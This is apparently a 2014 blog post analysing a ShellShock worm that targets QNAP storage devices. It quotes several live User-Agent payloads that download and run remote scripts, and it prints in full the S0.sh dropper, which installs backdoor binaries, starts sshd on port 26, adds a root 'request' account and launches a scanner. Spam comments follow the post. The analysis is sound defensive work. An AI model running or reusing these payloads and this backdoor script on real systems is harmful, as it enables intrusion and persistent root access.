The initial attack consisted of a connection to a web server with a bash exploit embedded in the HTTP header:
URL: "/cgi-bin/authLogin.cgi"
HTTP header included: "User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 "
This looks like fun!
It's very clear here what the exploit it trying to do. The User-Agent is passed to the application as an environment variable. This sets up the bash vulnerability, which proceeds to executes code to delete any previous copies of itself, grab a copy of S0.sh from a distribution point aand execute it. Let's also grab a copy and see what we get.
First though, let's think about safety for a second. We know this is a malicious attack, so we have to assume that there might be some nasty surprises to be found. Here are some of the precautions that I took (you may decide to take others)
- The initial attack appears to be a simple shell script, so it should be safe to download and view. Despite that, I spun up a VM with no sensitive data or access, to work on this. Probably overly paranoid, but don't forget that /bin/less was recently compromised.
- In the spirit of being paranoid, I decided not to expose an IP address I care about to the attacker. If the attacker wants to, he/she might be able to determine from their logs when non-infected machines connect to there server. No point in giving them a more interesting target to attack.
- If I were to get to the point of executing malicious code (which, in this case, I didn't) I would be even more paranoid about building a stand-alone environment.
The good news is that they didn't try to obfuscate the code. In fact, we'll see there are even a few comments left.
Line 3 looks to me like an attempt to cover their tracks a bit. There won't be any tell-tale commands floating around an an account's command line history.
Line 5 is the first really interesting part. Interestingly, this is the same IP that the initial exploit downloaded S0.sh from. In my copy of the exploit, this address resolves to gaspolo.uaservers.net. Doing a quick web search for this hostname brings up a record on a blacklist site where somebody complained three days ago about "hacking" from that site. It's nice to see that I'm not alone. :-)
S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands.
On line 10 we can see that they're starting to make decisions based on the architecture of the machine running S0.sh. Lines 10 - 90 handle downloading the new programs and setting up the environment for them to run in (for the ARM architecture). Lines 91-176 handle Intel 686 processors (essentially 32 bit Intel) and lines 177 - 226 are for 64 bit Intel machines. Although the sections are different in some ways, they're essentially the same:
- They download two files, and install them on the machine
- They set up a script "autorun" to run those two files.
- For the ARM and 686 architectures, they install a package manager (the "Itsy" package manager)
- They start ssh on port 26 (e.g. see line 168)
- They add an account named "request" (on line 233)
- I'm running John against the password hash. But I don't have a 31337 password cracking rig so I don't expect much. :-)
- They install a patch against the ShellShock bug (see line 246)
- I believe this is why they installed the Itsy package manager
- If it's not already there, they download a program named "run" to a hidden directory, which they then run (line 252, 263)
- A comment (line 250) implies this is the scanner
- They reboot the machine
Unfortunately, my analysis of this script is limited and ends here. By the time I got around to trying to analyze this script, the server which provides the downloaded files was no longer responding. Either the load of providing these files to all the infected machines has overwhelmed it, it's being subject to a DOS attack, or it's been taken down. Given that my download attempts timed out, versus my getting a file not found or a RST, I tend to favor the first two theories. In any event, I was unable to grab a copy of the other files from this server.
Note BTW the comment on line 6, which hints at another possible site to get this software. Do Not Just Blindly Go There! Attempts to collect the files from there just produce an attempt by that site to redirect you to a known malicious site, bodisparking.com.
Based on the patch which is installed, it's clear that this worm is trying to compromise QNAP devices (qnap.com ). QNAP is a provider of network storage devices, including devices intended for home or small business use. While it seems likely that compromised QNAP devices are being used to scan for more victims (the reference to scan on line 250), it remains unclear what additional use the attackers make of compromised machines.
Update 12/21/2014: So the line of reasoning above turns out to be completely wrong. Based on a suggestion, I dug deeper and was surprised to discover that only one of the many Internet facing servers actually listens on port 8080, so it's the only one which is seeing this probe. Sometimes, the explanation to something is *way* simpler than you expect. :-)
So that's it. The investigation accomplished my primary objective, which was to assess the risk of this attack to the machine being attacked. I can safely say that the machine being attacked by this worm is not at risk.
My secondary goal was to understand why the machine was being attacked, and to learn something about the methods and intentions of the attackers. In that goal I was less successful, primarily because I did not succeed in obtaining and analyzing the complete attack package. But I still learned a lot, and had a lot of fun!
I also learned a good lesson ... when something like this comes along, you need to jump on it quickly. The infrastructure associated with an attack is ephemeral, and if you're not prepared ahead of time, and don't investigate it quickly, you may lose your chance. Build that spare VM now! And think through ahead of time what you're going to do when something like this comes along!
Here's the actual code in S0.sh, which is the code that would be executed if the initial ShellShock attack had succeeded. The only change I've made is to add line numbers.
1: #!/bin/sh
2: export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
3: unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY
4: os=`uname -m`
5: ip=185.14.30.79
6: #wget -P /tmp/ http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh
7: #
8: #
9: fold=/share/MD0_DATA/optware/.xpl/
10: if [[ "$os" == 'armv5tel' ]]; then
11: echo "nameserver 8.8.8.8" >> /etc/resolv.conf
12: mkdir -p /share/MD0_DATA/optware/
13: mkdir -p /share/MD0_DATA/optware/.xpl/
14: wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/.cgi
15: wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/.cgi
16: wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
17:
18: busybox wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/.cgi
19: busybox wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/.cgi
20: busybox wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
21: wget -c -P /home/httpd/cgi-bin/ http://$ip/armgH.cgi
22: busybox wget -c -P /home/httpd/cgi-bin/ http://$ip/armgH.cgi
23: chmod +x ${fold}.cgi
24: chmod 4755 /home/httpd/cgi-bin/armgH.cgi
25: mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi
26: cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi
27: sleep 1
28: mount -t ext2 /dev/mtdblock5 /tmp/config
29: sleep 2
30: echo "/share/MD0_DATA/optware/.xpl/.cgi" >> /tmp/config/autorun.sh
31: echo " " >> /tmp/config/autorun.sh
32: echo "cp /share/MD0_DATA/optware/.xpl/.exo.cgi /home/httpd/cgi-bin/exo.cgi" >> /tmp/config/autorun.sh
33: sort -u /tmp/config/autorun.sh >> /tmp/a
34: mv /tmp/a /tmp/config/autorun.sh
35: chmod +x /tmp/config/autorun.sh
36: echo "sleep 30 && cp -f /opt/sbin/sshd /usr/sbin/sshd && /opt/etc/openssh/sshd_config /etc/ssh/sshd_config && /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26 & " >> /tmp/config/autorun.sh
37: echo "sleep 200 && sh `echo ${fold}run` &" >> /tmp/config/autorun.sh
38: echo 'cp /etc/resolv.conf /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
39: echo 'cp /etc/hostname /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
40: echo 'cp /etc/TZ /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
41: echo 'cp /etc/config/passwd /etc/config/group /etc/config/shadow /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
42: echo 'rm -rf /opt' >> /tmp/config/autorun.sh
43: echo 'ln -sf /share/MD0_DATA/optware/opt /opt' >> /tmp/config/autorun.sh
44: echo '' >> /tmp/config/autorun.sh
45: echo 'mount -o bind /dev /share/MD0_DATA/optware/dev' >> /tmp/config/autorun.sh
46: echo 'mount -o bind /proc /share/MD0_DATA/optware/proc' >> /tmp/config/autorun.sh
47: echo 'mount -o bind /proc/bus/usb /share/MD0_DATA/optware/proc/bus/usb' >> /tmp/config/autorun.sh
48: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qmultimedia' >> /tmp/config/autorun.sh
49: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qdownload' >> /tmp/config/autorun.sh
50: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qusb' >> /tmp/config/autorun.sh
51: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qweb' >> /tmp/config/autorun.sh
52: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Public' >> /tmp/config/autorun.sh
53: echo '# adding Ipkg apps into system path ...' >> /tmp/config/autorun.sh
54:
55: echo "export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin " >> /tmp/config/autorun.sh
56:
57: cp -af /share/MD0_DATA/optware/Optware-ipkg.sh /share/MD0_DATA/optware.foo/Optware-ipkg.sh
58: mkdir -p /share/MD0_DATA/optware/opt
59: mkdir /share/MD0_DATA/optware/ipkglib
60: cd /
61: cp -fr /opt/* /share/MD0_DATA/optware/opt/
62: ln -sf /share/MD0_DATA/optware/ipkglib /usr/lib/ipkg
63: ln -sf /share/HDA_DATA/optware/ipkglib /usr/lib/ipkg
64: rm -rf /opt
65: ln -sf /share/MD0_DATA/optware/opt /opt
66: cd /share/MD0_DATA/optware/opt
67: wget -c http://ipkg.nslu2-linux.org/feeds/optware/cs05q3armel/cross/unstable/ipkg-opt_0.99.163-10_arm.ipk
68: tar -xOvzf ipkg-opt_*_arm.ipk ./data.tar.gz | tar -C / -xzvf -
69: echo 'src cs05q3armel http://ipkg.nslu2-linux.org/feeds/optware/cs05q3armel/cross/stable' >> /opt/etc/ipkg.conf
70: /opt/bin/ipkg update
71: cd /share/MD0_DATA/optware
72: /opt/bin/ipkg update
73: echo '#!/bin/sh' >> /usr/bin/ipkg
74: echo 'echo "${$1}lling"'>> /usr/bin/ipkg
75: echo '/opt/bin/ipkg install $2 --tmp-dir=/share/MD0_DATA/ '>> /usr/bin/ipkg
76: chmod 777 /usr/bin/ipkg
77: ipkg install openssh
78: sleep 1
79: cp -f /opt/sbin/sshd /usr/sbin/sshd
80: cp -f /opt/etc/openssh/sshd_config /etc/ssh/sshd_config
81: sleep 2
82: /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26
83: cd /
84: umount /tmp/config
85:
86: rm -fr /mnt/update /mnt/HDA_ROOT/update
87: umount /mnt/update
88:
89: sleep 1
90: rm -fr /mnt/update
91: elif [[ "$os" == 'i686' ]]; then
92: echo "nameserver 8.8.8.8" >> /etc/resolv.conf
93: mkdir -p /share/MD0_DATA/optware/ $fold
94:
95:
96: wget -c -P $fold http://$ip/..32
97: wget -c -P $fold http://$ip/gH.cgi
98:
99: busybox wget -c -P $fold http://$ip/..32
100: busybox wget -c -P $fold http://$ip/gH.cgi
101: chmod 4755 ${fold}gH.cgi
102: chmod 777 ${fold}..32
103: mv ${fold}gH.cgi ${fold}.exo.cgi
104: cp -fr ${fold}.exo.cgi /home/httpd/cgi-bin/exo.cgi
105:
106: mount /dev/sdx6 /tmp/config
107: echo "`echo ${fold}`..32" >> /tmp/config/autorun.sh
108: sort -u /tmp/config/autorun.sh >> /tmp/a
109: mv /tmp/a /tmp/config/autorun.sh
110: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
111: chmod 777 /tmp/config/autorun.sh
112: cd /
113:
114:
115: umount /tmp/config
116: PUF=`ls -a /dev/s* | grep -v 1 | grep 6 `
117: echo $PUF >> /tmp/az1
118: for LINE in `cat /tmp/az1`; do PAte=`echo $LINE `; /bin/mount -t ext2 $PAte /tmp/config ; /bin/sleep 1 ; done
119: export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
120: echo "`echo ${fold}`..32" >> /tmp/config/autorun.sh
121: cat /tmp/config/autorun.sh | sort -u >> /tmp/a
122: mv /tmp/a /tmp/config/autorun.sh
123: cat /tmp/config/autorun.sh | grep -v exo >> /tmp/o
124: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/o
125: mv /tmp/o /tmp/config/autorun.sh
126: chmod +x /tmp/config/autorun.sh
127: echo 'cp /etc/resolv.conf /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
128: echo 'cp /etc/hostname /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
129: echo 'cp /etc/TZ /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
130: echo 'cp /etc/config/passwd /etc/config/group /etc/config/shadow /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
131: echo 'rm -rf /opt' >> /tmp/config/autorun.sh
132: echo 'sleep 2' >> /tmp/config/autorun.sh
133: echo 'ln -sf /share/MD0_DATA/optware/opt /opt' >> /tmp/config/autorun.sh
134: echo '' >> /tmp/config/autorun.sh
135: echo 'mount -o bind /dev /share/MD0_DATA/optware/dev' >> /tmp/config/autorun.sh
136: echo 'mount -o bind /proc /share/MD0_DATA/optware/proc' >> /tmp/config/autorun.sh
137: echo 'mount -o bind /proc/bus/usb /share/MD0_DATA/optware/proc/bus/usb' >> /tmp/config/autorun.sh
138: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qmultimedia' >> /tmp/config/autorun.sh
139: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qdownload' >> /tmp/config/autorun.sh
140: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qusb' >> /tmp/config/autorun.sh
141: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qweb' >> /tmp/config/autorun.sh
142: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Public' >> /tmp/config/autorun.sh
143: echo '# adding Ipkg apps into system path ...' >> /tmp/config/autorun.sh
144: echo "export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin:/usr/bin/X11:/usr/local/sbin " >> /tmp/config/autorun.sh
145:
146: mkdir -p /share/MD0_DATA/optware/opt
147: mkdir /share/MD0_DATA/optware/ipkglib
148: cd /
149: cp -fr /opt/* /share/MD0_DATA/optware/opt/
150: ln -sf /share/MD0_DATA/optware/ipkglib /usr/lib/ipkg
151: rm -rf /opt
152: ln -sf /share/MD0_DATA/optware/opt /opt
153: cd /share/MD0_DATA/optware/opt
154: wget -c http://ipkg.nslu2-linux.org/feeds/optware/i686g25/cross/unstable/ipkg-opt_0.99.163-10_i686.ipk
155: tar -xOvzf ipkg-opt_*_i686.ipk ./data.tar.gz | tar -C / -xzvf -
156: echo 'src i686g25 http://ipkg.nslu2-linux.org/feeds/optware/i686g25/cross/unstable/' >> /opt/etc/ipkg.conf
157: /opt/bin/ipkg update
158: cd /share/MD0_DATA/optware
159: echo '#!/bin/sh' >> /usr/bin/ipkg
160: echo 'echo "${$1}lling"'>> /usr/bin/ipkg
161: echo '/opt/bin/ipkg install $2 --tmp-dir=/share/MD0_DATA/ '>> /usr/bin/ipkg
162: chmod 777 /usr/bin/ipkg
163: ipkg install openssh
164: sleep 2
165: cp -f /opt/sbin/sshd /usr/sbin/sshd
166: cp -f /opt/etc/openssh/sshd_config /etc/ssh/sshd_config
167: sleep 1
168: /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26
169: echo "sleep 200 && sh `echo ${fold}run` &" >> /tmp/config/autorun.sh
170: echo "sleep 80 && cp -f /opt/etc/openssh/sshd_config /etc/ssh/sshd_config && cp -f /opt/sbin/sshd /usr/sbin/sshd && /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26 &" >> /tmp/config/autorun.sh
171: cd /
172: umount /tmp/config
173: sleep 1
174:
175:
176:
177: elif [[ "$os" == 'x86_64' ]]; then
178: echo "nameserver 8.8.8.8" >> /etc/resolv.conf
179: # mkdir -p $fold
180:
181: wget -P $fold http://$ip/..64
182: wget -P $fold http://$ip/64.cgi
183: cp ${fold}64.cgi /home/httpd/cgi-bin/exo.cgi
184: mv ${fold}64.cgi ${fold}.exo.cgi
185: chmod +x ${fold}..64
186: chmod 4755 ${fold}64.cgi
187: mount -t ext2 /dev/sdk6 /tmp/config
188: sleep 2
189: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
190: chmod 777 /tmp/config/autorun.sh
191: echo "`echo ${fold}`..64" >> /tmp/config/autorun.sh
192: cd /
193: umount /tmp/config
194: rm -fr /tmp/config/autorun.sh
195: mount /dev/sdx6 /tmp/config
196: sleep 2
197: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
198: chmod 777 /tmp/config/autorun.sh
199: echo "`echo ${fold}`..64" >> /tmp/config/autorun.sh
200: cd /
201: umount /tmp/config
202: rm -fr /tmp/config/autorun.sh
203: mount -t ext2 /dev/sdg6 /tmp/config
204: sleep 2
205: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
206: chmod 777 /tmp/config/autorun.sh
207: echo "`echo ${fold}`..64" >> /tmp/config/autorun.sh
208: cd /
209: umount /tmp/config
210: rm -fr /tmp/config/autorun.sh
211:
212: PUF=`ls -a /dev/s* | grep -v 1 | grep 6 `
213: echo $PUF >> /tmp/az1
214: for LINE in `cat /tmp/az1`; do PA9=`echo $LINE `; /bin/mount -t ext2 $PA9 /tmp/config ; /bin/sleep 1 ; done
215: /bin/sleep 1
216: export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
217: sort -u /tmp/config/autorun.sh >> /tmp/config/aa
218: /bin/mv /tmp/config/aa /tmp/config/autorun.sh
219: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
220: chmod 777 /tmp/config/autorun.sh
221: echo "`echo ${fold}`..64" >> /tmp/config/autorun.sh
222: cd /
223: cat /tmp/config/autorun.sh | grep -v exo >> /tmp/o
224: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/o
225: umount /tmp/config
226: fi
227:
228: Search="request"
229: Files="/etc/passwd"
230: if grep $Search $Files; then
231: echo "$Search user its just added!"
232: else
233: echo "request:x:0:0:request:/share/homes/admin:/bin/sh" >> /etc/passwd
234: echo 'request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::' >> /etc/shadow
235: fi
236:
237:
238: #conf group
239: TETTE=`cat /etc/group | grep administra`
240: printf "$TETTE,request" >> /tmp/g
241: cat /etc/group | grep -v adminis >> g
242: mv g /etc/group
243: chmod 777 /etc/group
244: #inst patch
245:
246: wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin
247: chmod +x /mnt/HDA_ROOT/update_pkg/ShellshockFix_1.0.2_20141008_all.bin
248: /mnt/HDA_ROOT/update_pkg/ShellshockFix_1.0.2_20141008_all.bin
249:
250: #inst scan
251: sfolder="/share/HDB_DATA/.../"
252: url69="http://185.14.30.79/run"
253: #t -P
254: if [ ! -f $sfolder ];then
255: mkdir -p $sfolder
256: cd $sfolder
257: wget $url69
258: wget $url69 -P ${fold} -q
259: chmod +x ${sfolder}run ${fold}run
260: #sh run &
261: fi
262: cd $fold
263: sh run &
264:
265: #`echo ${fold}`
266:
267: busybox reboot
268: /bin/reboot
269: /sbin/reboot
270: rm $0
271: rm -fr /tmp/S1.sh /tmp/S2.sh /tmp/az1 /tmp/config/autorun.sh /tmp/o /tmp/S0.sh
272: exit
Here are some references:
As usual, SANS is all over this one. Here's their analysis of what appears to be the same worm:
https://isc.sans.edu/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061
The devices being attacked: http://www.qnap.com/
Article about other worms attacking the same devices: http://www.pcworld.com/article/2690932/shellshock-attacks-target-qnaps-network-storage-fireeye-says.html
Another article about other worms attacking the same devices: https://www.fireeye.com/blog/threat-research/2014/10/the-shellshock-aftershock-for-nas-administrators.html
A couple of explanations of the ShellShock vulnerability:
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
http://en.wikipedia.org/wiki/Shellshock_(software_bug)
The package utility the worm uses: http://en.wikipedia.org/wiki/Ipkg
Info on the malicious site (bodisparking.com) you're sent to if you contact the host in the comment (qupn.byethost5.com) : http://www.enigmasoftware.com/bodisparkingcom-removal/
Don't do it!
Update 12/21/2014: Since the original posting, I have seen several variations of this same attack. They all utilized the same attack vector (URL is "/cgi-bin/authLogin.cgi", the attack is embedded in the "User-Agent" header). While they are different, they are all still trying to run a version of S0.sh described above.
() { :; }; /bin/rm -rf /tmp/S0.php /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://x3q.altervista.org/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh && sh S0.php 0<&1 2>&1 &
() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
When I checked the download server for each of these attacks, it was already either down or not providing these files anymore.
However, as of this writing (12/21/2014 @ 15:10 UTC) the download server for this attack was still responding:
() { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -P /tmp && /bin/sh /tmp/S0.php 0<&1 2>&1
I have no idea how much longer that server will remain up until it's shutdown. (I have sent a notification to the best contact I could find.)
Reviewing the S0.php script from this attack shows that "S0" has evolved, some sections of code have been rewritten, but the ultimate functionality is unchanged.
Finally, here's my favorite one so far:
() { :; }; /bin/rm -rf /tmp/io.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://nyo2k2.altervista.org/io.php -P /tmp && /bin/rm /tmp/io.php 0<&1 2>&1
Why my favorite? Compare it to the others ... instead of using /bin/sh to run the attack script, it uses /bin/rm to delete it! This has got to be a bug; perhaps a test version which made it into the wild or perhaps the result of some weird data corruption which is occurring somehow. But the overall result is that this version will not propagate itself.
Fun stuff!
BTW, thanks to Erich, who's also been looking at this worm and has been generous with the insights he's gleaned about it.
Thanks for your article.. it is very helpful for me to understand ShellShock attack against QNAP Device.. nowdays, some this above Attack Traffic comes to Korea from Attacker.. thanks, have a good day
ReplyDeleteI'm glad it was helpful.
ReplyDeletethey upgraded the bugged script: localhost:80 93.104.83.77 - - [25/Mar/2015:17:17:56 -0300] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 364 "-" "() { :; }; /bin/rm -rf /tmp/S0.php /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://x3q.altervista.org/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh && sh S0.php 0<&1 2>&1 &"
ReplyDeleteThanks for sharing! Nice post!
ReplyDeleteMáy ru võng hay võng điện cho bé hay võng tự đưa giúp bé ngủ ngon mà đưa võng tự động không tốn sức ru võng. Võng tự động hay vong em be tu dong chắc chắn, gọn gàng, dễ tháo xếp, dễ di chuyển và may dua vong dễ dàng bảo quản.
Chia sẻ các bạn có nên cho trẻ sơ sinh nằm nghiêng khi ngủ hay mơ thấy mình có bầu là điềm gì hay cách chống nắng bằng trà xanh hay Collagen trị mụn được không hay chữa mất ngủ bằng gừng đơn giản, bí quyết làm trắng da bằng cà phê và dầu dừa hay giảm cân nhanh bằng gạo lứt hq hay mẹo giúp tăng cường trí nhớ hiệu quả, kinh nghiệm trị tiêu chảy cho bé bằng cà rốt hiệu quả, những thực phẩm giúp cải thiện trí nhớ hiệu quả, mẹo hay giúp trẻ thích ăn rau hay cách giúp trẻ hạ sốt nhanh hiệu quả, bệnh viêm khớp không nên ăn gì hay mẹo giúp giảm độ cận thị cho bạn, bí quyết chống nắng với cà chua cực hiệu quả, cách giúp bé ngủ ngon giấc và thực phẩm giúp bé ngủ ngon mẹ nên biết, chia sẻ cách làm trắng da toàn thân bằng thực phẩm, những món ăn chữa bệnh mất ngủ hay mách mẹ mẹo giúp bé không sốt khi mọc răng hiệu quả
Những thực phẩm giúp đẹp da tại http://nhungthucphamgiupda.blogspot.com/
Thực phẩm giúp bạn trẻ đẹp tại http://thucphamgiuptre.blogspot.com/
Thực phẩm làm tăng tại http://thucphamlamtang.blogspot.com/
Những thực phẩm giúp làm giảm tại http://thucphamlamgiam.blogspot.com/
Great article and very interesting i like to read article especially that talk about computer security and tips.
ReplyDeletehttps://fixmypcerror.wordpress.com/
Looks like you did a lot of work on this just 2 days before I even started trying to understand what I was seeing.
ReplyDeleteThis page probably didn't even have an index at the time since I was unable to search this down and post it as a response to some stackoverflow user question.